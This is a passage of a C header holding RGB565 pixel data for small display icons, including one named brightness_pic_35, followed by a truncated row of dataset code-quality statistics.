0x0000, 0x0000, 0x0000, 0x9492, 0xffff, 0x73ae, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2104, 0xffff, 0x9cf3, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x4208, 0xffff, 0xbdd7, 0x0841, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x738e, 0xffdf, 0x528a, 0x0000, 0x0000, 0x0000,
0x0000, 0x0841, 0xad55, 0xffdf, 0x39c7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x4208, 0x3186, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0xc638, 0xc618, 0x1082, 0x0000, 0x0000,
0x0000, 0x39e7, 0xffff, 0x9cf3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0xc638, 0x7bcf, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x5aeb, 0xffff, 0x4a49, 0x0000, 0x0000,
0x0000, 0x73ae, 0xffff, 0x5acb, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2965, 0xef7d, 0xd69a, 0x2104, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18c3, 0xce59, 0x9cf3, 0x0841, 0x0000,
0x0000, 0xb5b6, 0xc638, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x738e, 0xffff, 0xffff, 0x4a49, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0xdedb, 0x10a2, 0x0000,
0x1082, 0xffff, 0xad75, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0xd6ba, 0xffff, 0xffff, 0xe71c, 0x2104, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x738e, 0xf7be, 0x39c7, 0x0000,
0x18e3, 0xffff, 0x73ae, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2965, 0xffff, 0xffff, 0xffff, 0xffff, 0x52aa, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x39c7, 0xef5d, 0x5aeb, 0x0000,
0x2104, 0xffff, 0x52aa, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xb5b6, 0xffff, 0xffff, 0xffff, 0xffff, 0xbdd7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0xdefb, 0x73ae, 0x0000,
0x2104, 0xffff, 0x4a49, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x3186, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0xd69a, 0x7bef, 0x0000,
0x2104, 0xffff, 0x528a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x6b6d, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe71c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18c3, 0xdedb, 0x7bcf, 0x0000,
0x18e3, 0xffff, 0x6b6d, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xdedb, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3186, 0xe73c, 0x632c, 0x0000,
0x10a2, 0xffff, 0xa514, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4208, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xbdf7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x630c, 0xef7d, 0x39e7, 0x0000,
0x0000, 0xbdf7, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef7d, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0xdedb, 0x10a2, 0x0000,
0x0000, 0x7bef, 0xf7be, 0x4228, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0xd6ba, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x73ae, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0xb5b6, 0xad55, 0x0841, 0x0000,
0x0000, 0x4228, 0xffff, 0x9492, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2124, 0xe73c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x8410, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4a69, 0xffff, 0x4a69, 0x0000, 0x0000,
0x0000, 0x0841, 0xb596, 0xef5d, 0x2945, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x9cf3, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0x31a6, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0xad75, 0xc638, 0x10a2, 0x0000, 0x0000,
0x0000, 0x0000, 0x4a49, 0xffff, 0x9cf3, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0xb5b6, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x630c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x52aa, 0xffff, 0x5acb, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x9cf3, 0xffff, 0x4228, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0xa514, 0xdedb, 0xffff, 0xffff, 0xffff, 0xb5b6, 0x52aa, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffdf, 0xad55, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x10a2, 0xdedb, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0x2104, 0x2124, 0x18c3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffdf, 0x2124, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xd6ba, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffdf, 0x2124, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x10a2, 0xd69a, 0xffff, 0x6b4d, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4a49, 0xf7be, 0xffdf, 0x2124, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0xc618, 0xffff, 0xce79, 0x5aeb, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x39c7, 0xa514, 0xffff, 0xb5b6, 0x2945, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x630c, 0xc618, 0xffff, 0xbdd7, 0x8c51, 0x5acb, 0x0841, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x2965, 0x8c51, 0x9cd3, 0xffff, 0xd69a, 0x632c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0x632c, 0xbdd7, 0xef7d, 0xffdf, 0xce79, 0xbdf7, 0xc618, 0xc618, 0xc618, 0xce59, 0xe73c, 0xf7be, 0xc618, 0x738e, 0x18e3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0x18c3, 0x52aa, 0x8c51, 0x9492, 0x9492, 0x9492, 0x9492, 0x8c71, 0x6b4d, 0x18c3, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000
};
const uint16_t brightness_pic_35[] = {
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2104, 0x2965, 0x4a69, 0x7bcf, 0x9492, 0x9492, 0x7bef, 0x528a, 0x31a6, 0x2104, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0x4228, 0x9492, 0xf7be, 0xffff, 0xffdf, 0xe71c, 0xd6ba, 0xd69a, 0xdefb, 0xf79e, 0xffff, 0xffdf, 0x9cf3, 0x4a49, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x528a, 0xad75, 0xffff, 0xf79e, 0x8c71, 0x7bcf, 0x4228, 0x2945, 0x18c3, 0x10a2, 0x2104, 0x39c7, 0x632c, 0x8430, 0xd69a, 0xffff, 0xbdf7, 0x52aa, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xbdd7, 0xffff, 0xffff, 0x73ae, 0x3186, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0x52aa, 0xce79, 0xffff, 0xbdf7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xffff, 0xb5b6, 0x10a2, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0x6b6d, 0xffff, 0xef7d, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xce79, 0xffff, 0x632c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0xffff, 0xf79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xffff, 0x4208, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xef7d, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x9cd3, 0xffff, 0x738e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0xffff, 0xbdf7, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x39c7, 0xffdf, 0xad55, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x528a, 0xf79e, 0x528a, 0x0000, 0x0000, 0x0000,
0x0000, 0x0020, 0x94b2, 0xffff, 0xa514, 0x73ae, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bef, 0x7bcf, 0x8c51, 0xffff, 0xad75, 0x0841, 0x0000, 0x0000,
0x0000, 0x2124, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x4a49, 0x0000, 0x0000,
0x0000, 0x6b4d, 0xffff, 0x738e, 0x2945, 0x2965, 0x2965, 0x2965, 0x2965, 0x2965, 0x4208, 0xdefb, 0x5acb, 0x2945, 0x2965, 0x2965, 0x2965, 0x2965, 0x2965, 0x2965, 0x2965, 0x2945, 0x5acb, 0xf7be, 0x5aeb, 0x2945, 0x2965, 0x2965, 0x2965, 0x2965, 0x39e7, 0xce79, 0x8430, 0x0000, 0x0000,
0x0000, 0xd6ba, 0xce59, 0x0841, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xbdf7, 0x630c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3186, 0xd6ba, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0xe71c, 0x18c3, 0x0000,
0x0020, 0xffff, 0xa514, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x7bcf, 0xffff, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0xffff, 0xa514, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x632c, 0xffff, 0x3186, 0x0000,
0x0020, 0xffff, 0x9492, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xad75, 0xe71c, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0xa534, 0xc638, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x39e7, 0xf7be, 0x31a6, 0x0000,
0x2104, 0xffff, 0x738e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xa534, 0xef7d, 0x52aa, 0x4228, 0x2965, 0x4208, 0x52aa, 0xdedb, 0xbdd7, 0x1082, 0x0000, 0x0000, 0x18e3, 0x18c3, 0x0000, 0x0000, 0x0000, 0x0000, 0x2124, 0xe73c, 0x4228, 0x0000,
0x3186, 0xffff, 0x630c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0x4a69, 0x0000, 0x0000, 0x0000, 0x0000, 0x7bef, 0xa534, 0xc638, 0xbdf7, 0xc618, 0xad75, 0x9492, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c71, 0xce79, 0x630c, 0x0000, 0x0000, 0x0000, 0x18c3, 0xdefb, 0x5acb, 0x0000,
0x2104, 0xffff, 0x6b4d, 0x0000, 0x0000, 0x0000, 0x1082, 0xc618, 0xffff, 0x52aa, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2965, 0x4208, 0x3186, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3186, 0xad55, 0xffff, 0x9cd3, 0x0000, 0x0000, 0x2104, 0xe71c, 0x4a49, 0x0000,
0x0841, 0xffff, 0x8430, 0x0000, 0x0000, 0x738e, 0xf79e, 0xffff, 0x18c3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x3186, 0xffff, 0xbdd7, 0x0000, 0x31a6, 0xf79e, 0x31a6, 0x0000,
0x0020, 0xffff, 0xa534, 0x0000, 0x0000, 0xffdf, 0x9cf3, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0x7bef, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x73ae, 0x2965, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0x5aeb, 0x0000, 0x5acb, 0xffff, 0x31a6, 0x0000,
0x0000, 0xdefb, 0xbdf7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xad55, 0xffff, 0x0841, 0x0000, 0x0000, 0x0000, 0x0861, 0x0000, 0x0000, 0x0000, 0x0841, 0xffff, 0xb5b6, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0xe73c, 0x18c3, 0x0000,
0x0000, 0x738e, 0xffff, 0x4a49, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0xdedb, 0x9cf3, 0x0000, 0x0000, 0x0000, 0x632c, 0xffff, 0x528a, 0x0000, 0x0000, 0x0000, 0x8430, 0xef5d, 0x2965, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0xbdd7, 0x8c71, 0x0000, 0x0000,
0x0000, 0x2124, 0xffff, 0x9492, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x7bcf, 0xffff, 0x2104, 0x0000, 0x0000, 0x0000, 0x5acb, 0xffff, 0x39e7, 0x0000, 0x0000, 0x0000, 0x2104, 0xffff, 0x8c51, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4208, 0xffff, 0x4a69, 0x0000, 0x0000,
0x0000, 0x0841, 0xa514, 0xf79e, 0x2965, 0x0000, 0x0000, 0x0000, 0x0000, 0x2945, 0xe71c, 0xb5b6, 0x0861, 0x0000, 0x0000, 0x0000, 0x5acb, 0xffff, 0x4208, 0x0000, 0x0000, 0x0000, 0x0020, 0x9cf3, 0xf79e, 0x3186, 0x0000, 0x0000, 0x0000, 0x0000, 0xa534, 0xc618, 0x0861, 0x0000, 0x0000,
0x0000, 0x0000, 0x4208, 0xffff, 0x9cd3, 0x0000, 0x0000, 0x0000, 0x0000, 0x10a2, 0x9cd3, 0x4a49, 0x0000, 0x0000, 0x0000, 0x0000, 0x5acb, 0xffff, 0x4208, 0x0000, 0x0000, 0x0000, 0x0000, 0x39e7, 0x9cf3, 0x18e3, 0x0000, 0x0000, 0x0000, 0x39c7, 0xffff, 0x5aeb, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x9cf3, 0xffff, 0x39c7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x5aeb, 0xffff, 0x4228, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xce59, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0xce59, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4228, 0xce79, 0x31a6, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xf79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0xd6ba, 0xffff, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xf7be, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0xce59, 0xffff, 0x6b6d, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3186, 0xffff, 0xf79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xbdf7, 0xffff, 0xce79, 0x4228, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x39c7, 0x9cd3, 0xffff, 0xce59, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x632c, 0xc618, 0xffff, 0xbdf7, 0x8c51, 0x4a69, 0x18c3, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0x31a6, 0x7bcf, 0x9cd3, 0xffdf, 0xd6ba, 0x6b4d, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x10a2, 0x528a, 0xa534, 0xffff, 0xffff, 0xdedb, 0xc618, 0xb5b6, 0xb5b6, 0xbdf7, 0xd69a, 0xf79e, 0xffff, 0xb596, 0x5acb, 0x18e3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0x2945, 0x2965, 0x6b4d, 0x94b2, 0xad55, 0xad75, 0x9cd3, 0x6b6d, 0x31a6, 0x2945, 0x0841, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000
};
| 49,081 | image | h | ja | c | code | {"qsc_code_num_words": 18860, "qsc_code_num_chars": 49081.0, "qsc_code_mean_word_length": 1.9242842, "qsc_code_frac_words_unique": 0.00954401, "qsc_code_frac_chars_top_2grams": 0.22757081, "qsc_code_frac_chars_top_3grams": 0.33693376, "qsc_code_frac_chars_top_4grams": 0.39289651, "qsc_code_frac_chars_dupe_5grams": 0.97591756, "qsc_code_frac_chars_dupe_6grams": 0.94326573, "qsc_code_frac_chars_dupe_7grams": 0.91708917, "qsc_code_frac_chars_dupe_8grams": 0.88722032, "qsc_code_frac_chars_dupe_9grams": 0.86407473, "qsc_code_frac_chars_dupe_10grams": 0.84674308, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.55404959, "qsc_code_frac_chars_whitespace": 0.13714065, "qsc_code_size_file_byte": 49081.0, "qsc_code_num_lines": 109.0, "qsc_code_num_chars_line_max": 1100.0, "qsc_code_num_chars_line_mean": 450.28440367, "qsc_code_frac_chars_alphabet": 0.30290437, "qsc_code_frac_chars_comments": 0.0040749, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.10784314, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.73797054, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.0, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.0, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 1, "qsc_code_frac_chars_top_2grams": 1, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 1, "qsc_code_frac_chars_dupe_6grams": 1, "qsc_code_frac_chars_dupe_7grams": 1, "qsc_code_frac_chars_dupe_8grams": 1, "qsc_code_frac_chars_dupe_9grams": 1, "qsc_code_frac_chars_dupe_10grams": 1, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 1, "qsc_code_num_chars_line_mean": 1, "qsc_code_frac_chars_alphabet": 1, "qsc_code_frac_chars_digital": 1, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, 